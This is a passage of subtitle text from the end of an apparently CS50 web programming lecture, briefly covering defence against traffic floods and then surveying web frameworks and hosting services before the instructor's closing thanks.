1777 01:19:49,380 --> 01:19:51,550 So that's certainly something we could think about as well. 1778 01:19:51,550 --> 01:19:53,466 But in the end of things, it really often does 1779 01:19:53,466 --> 01:19:56,340 come down to just a battle of resources, of who has more resources. 1780 01:19:56,340 --> 01:19:58,810 Is it the adversary or is it yourself? 1781 01:19:58,810 --> 01:20:01,186 And so oftentimes this is not something that you can just 1782 01:20:01,186 --> 01:20:03,185 deal with at the web application level, but it's 1783 01:20:03,185 --> 01:20:06,390 something that needs to be dealt with at the server level or the ISP level. 1784 01:20:06,390 --> 01:20:08,280 Where you really need to make sure that your infrastructure is 1785 01:20:08,280 --> 01:20:11,550 in place, especially if you're dealing with a large web application, 1786 01:20:11,550 --> 01:20:15,360 to make sure that you're able to handle all of that potential traffic. 1787 01:20:15,360 --> 01:20:18,450 And so certainly, the end idea of this and of all the topics 1788 01:20:18,450 --> 01:20:21,420 we've talked about so far today is that through all of the things 1789 01:20:21,420 --> 01:20:24,590 we've talked about, whether it was just a simple, static HTML web page 1790 01:20:24,590 --> 01:20:28,170 or dealing with scalability and Flask and Django and other web services, 1791 01:20:28,170 --> 01:20:31,710 or JavaScript and how we might be able to inject JavaScript code into our web 1792 01:20:31,710 --> 01:20:35,070 application, there are security vulnerabilities everywhere. 1793 01:20:35,070 --> 01:20:37,170 And it's definitely a good idea to be thinking 1794 01:20:37,170 --> 01:20:39,300 about what those vulnerabilities might be 1795 01:20:39,300 --> 01:20:42,840 and how we might be able to deal with them when they arrive. 1796 01:20:42,840 --> 01:20:47,190 And so now let's think about moving beyond just this course 1797 01:20:47,190 --> 01:20:49,440 as we arrive at the conclusion of the course. 
1798 01:20:49,440 --> 01:20:50,400 What comes next? 1799 01:20:50,400 --> 01:20:52,020 If this is still something that interests you, 1800 01:20:52,020 --> 01:20:53,370 if web programming is something that you're 1801 01:20:53,370 --> 01:20:55,291 interested in continuing to learn more about, 1802 01:20:55,291 --> 01:20:57,540 we were just really barely scratching the surface here 1803 01:20:57,540 --> 01:21:00,180 when it came to programming with Python and JavaScript. 1804 01:21:00,180 --> 01:21:04,170 We looked at Flask and Django in particular as the web frameworks 1805 01:21:04,170 --> 01:21:07,230 that we were using in order to build and design and deploy our websites. 1806 01:21:07,230 --> 01:21:09,800 But those certainly are not the only options. 1807 01:21:09,800 --> 01:21:12,304 There are other web frameworks that are gaining popularity 1808 01:21:12,304 --> 01:21:14,220 in modern times, nowadays, that are definitely 1809 01:21:14,220 --> 01:21:17,011 worth looking into if this is the sort of thing that interests you. 1810 01:21:17,011 --> 01:21:20,100 Generally, we can divide them into server-side frameworks, 1811 01:21:20,100 --> 01:21:23,130 the sort of frameworks that are going to be running like Flask or Django 1812 01:21:23,130 --> 01:21:28,500 on our web server somewhere, where Express.js and Ruby on Rails 1813 01:21:28,500 --> 01:21:31,420 are examples of some server-side frameworks that we'll commonly use. 1814 01:21:31,420 --> 01:21:32,086 Actually, sorry. 1815 01:21:32,086 --> 01:21:35,010 This is mislocated a little bit. 1816 01:21:35,010 --> 01:21:38,794 And client-side frameworks include things like React or Angular 1817 01:21:38,794 --> 01:21:41,460 that are common frameworks that are used on the client-side now, 1818 01:21:41,460 --> 01:21:44,460 in order to generate components that are displayed 1819 01:21:44,460 --> 01:21:47,630 that are able to interact with the web server in some way. 
1820 01:21:47,630 --> 01:21:50,140 And so these are definitely things to look at as well. 1821 01:21:50,140 --> 01:21:53,019 And then when it comes to actually taking your web application 1822 01:21:53,019 --> 01:21:54,810 and deploying it to the internet, if that's 1823 01:21:54,810 --> 01:21:56,880 something that's of interest to you as well, 1824 01:21:56,880 --> 01:21:58,740 there are a whole number of other services 1825 01:21:58,740 --> 01:22:00,156 that you can use as well for that. 1826 01:22:00,156 --> 01:22:02,100 So GitHub Pages was one that we looked at way 1827 01:22:02,100 --> 01:22:04,391 at the very beginning of the course, which is generally 1828 01:22:04,391 --> 01:22:08,250 used if we just want to deploy some static content to a page like HTML 1829 01:22:08,250 --> 01:22:09,540 and CSS and JavaScript. 1830 01:22:09,540 --> 01:22:11,269 And that's totally fine for GitHub Pages. 1831 01:22:11,269 --> 01:22:14,310 But if we want to run a web server, we're going to need a little bit more 1832 01:22:14,310 --> 01:22:15,160 than that. 1833 01:22:15,160 --> 01:22:17,280 And so we did look a little bit at Heroku 1834 01:22:17,280 --> 01:22:19,310 when we were thinking about using our database. 1835 01:22:19,310 --> 01:22:23,370 So Heroku is a service that allows us to host web applications on the internet. 1836 01:22:23,370 --> 01:22:26,400 It makes it relatively easy to take a Flask or Django web application 1837 01:22:26,400 --> 01:22:27,252 and host it. 1838 01:22:27,252 --> 01:22:30,210 And in particular, it makes it very easy to hook that up to a database, 1839 01:22:30,210 --> 01:22:33,150 for instance, in order to connect it with a PostgreSQL database, 1840 01:22:33,150 --> 01:22:35,400 as we did in one of the early projects in order 1841 01:22:35,400 --> 01:22:37,560 to allow us to deploy that as well. 
1842 01:22:37,560 --> 01:22:41,580 But if you're looking for even more power and even more feature-filled web 1843 01:22:41,580 --> 01:22:44,910 hosting than that, you can take a look at Amazon Web Services or Google Cloud 1844 01:22:44,910 --> 01:22:48,360 or Microsoft Azure, all of which offer a lot of different services 1845 01:22:48,360 --> 01:22:51,300 for taking web applications and deploying them to the internet. 1846 01:22:51,300 --> 01:22:53,841 They often will use Docker, which we looked at a little while 1847 01:22:53,841 --> 01:22:56,790 back when we were talking about containerizing our application 1848 01:22:56,790 --> 01:22:59,820 and bundling together our web application with the database 1849 01:22:59,820 --> 01:23:03,000 and any other services that might be involved in running that application. 1850 01:23:03,000 --> 01:23:04,860 And so certainly these are services that you 1851 01:23:04,860 --> 01:23:07,680 can use as well if you're thinking about actually building out 1852 01:23:07,680 --> 01:23:10,350 one of these web applications and deploying it to the internet. 1853 01:23:10,350 --> 01:23:13,560 And these larger services like AWS or Microsoft Azure, 1854 01:23:13,560 --> 01:23:16,786 they have the ability to take care of some of the scalability concerns 1855 01:23:16,786 --> 01:23:17,910 that we were talking about. 1856 01:23:17,910 --> 01:23:20,310 The ability to add load balancers that are 1857 01:23:20,310 --> 01:23:23,212 able to make sure that we have enough servers 1858 01:23:23,212 --> 01:23:25,920 to make sure that we're able to handle all the requests coming in 1859 01:23:25,920 --> 01:23:27,210 from all the different users. 1860 01:23:27,210 --> 01:23:29,700 And they do auto scaling such that as more users come in, 1861 01:23:29,700 --> 01:23:33,130 we can increase the number of servers or decrease the number of servers as well. 
1862 01:23:33,130 --> 01:23:36,600 And so these are increasingly popular tools and technologies 1863 01:23:36,600 --> 01:23:39,780 that are ways of allowing people to take web applications that they're 1864 01:23:39,780 --> 01:23:44,010 building on their own computers and ultimately deploy them to the internet. 1865 01:23:44,010 --> 01:23:46,586 Before we wrap up, I just want to make sure to say thank you 1866 01:23:46,586 --> 01:23:48,960 to all the people that were really instrumental in making 1867 01:23:48,960 --> 01:23:50,040 the course possible. 1868 01:23:50,040 --> 01:23:53,060 To David, my co-instructor, who unfortunately couldn't be here today. 1869 01:23:53,060 --> 01:23:56,207 But also to our great teaching fellows, Anushree and Elle and Rodrigo 1870 01:23:56,207 --> 01:23:58,290 and Sebastian and Jessica for running the course's 1871 01:23:58,290 --> 01:24:00,210 office hours and the course's sections. 1872 01:24:00,210 --> 01:24:03,360 And of course, CS50's production team, Ramon and Andrew 1873 01:24:03,360 --> 01:24:06,450 and Max and Meredith and Ian and Scully and Dan and Arturo 1874 01:24:06,450 --> 01:24:09,180 for making the lectures possible and the lecture videos possible. 1875 01:24:09,180 --> 01:24:10,230 Thank you to you all. 1876 01:24:10,230 --> 01:24:13,560 And of course, finally, thank you to all of you for joining us in this course, 1877 01:24:13,560 --> 01:24:16,230 for learning about web programming with Python and JavaScript. 1878 01:24:16,230 --> 01:24:17,160 Hope you enjoyed it. 1879 01:24:17,160 --> 01:24:20,070 Hope you got an opportunity to work on some hands-on projects that 1880 01:24:20,070 --> 01:24:22,890 were exciting and ultimately showed you the power and capacity 1881 01:24:22,890 --> 01:24:26,100 that Python and JavaScript have for building really dynamic and really 1882 01:24:26,100 --> 01:24:27,840 interesting web applications.
1883 01:24:27,840 --> 01:24:31,029 Can't wait to see what you guys continue to do with your final projects. 1884 01:24:31,029 --> 01:24:33,570 But that's it for web programming with Python and JavaScript, 1885 01:24:33,570 --> 01:24:35,640 so thank you all so much. 1886 01:24:35,640 --> 01:24:39,890 [APPLAUSE] 1887 01:24:39,890 --> 01:24:40,641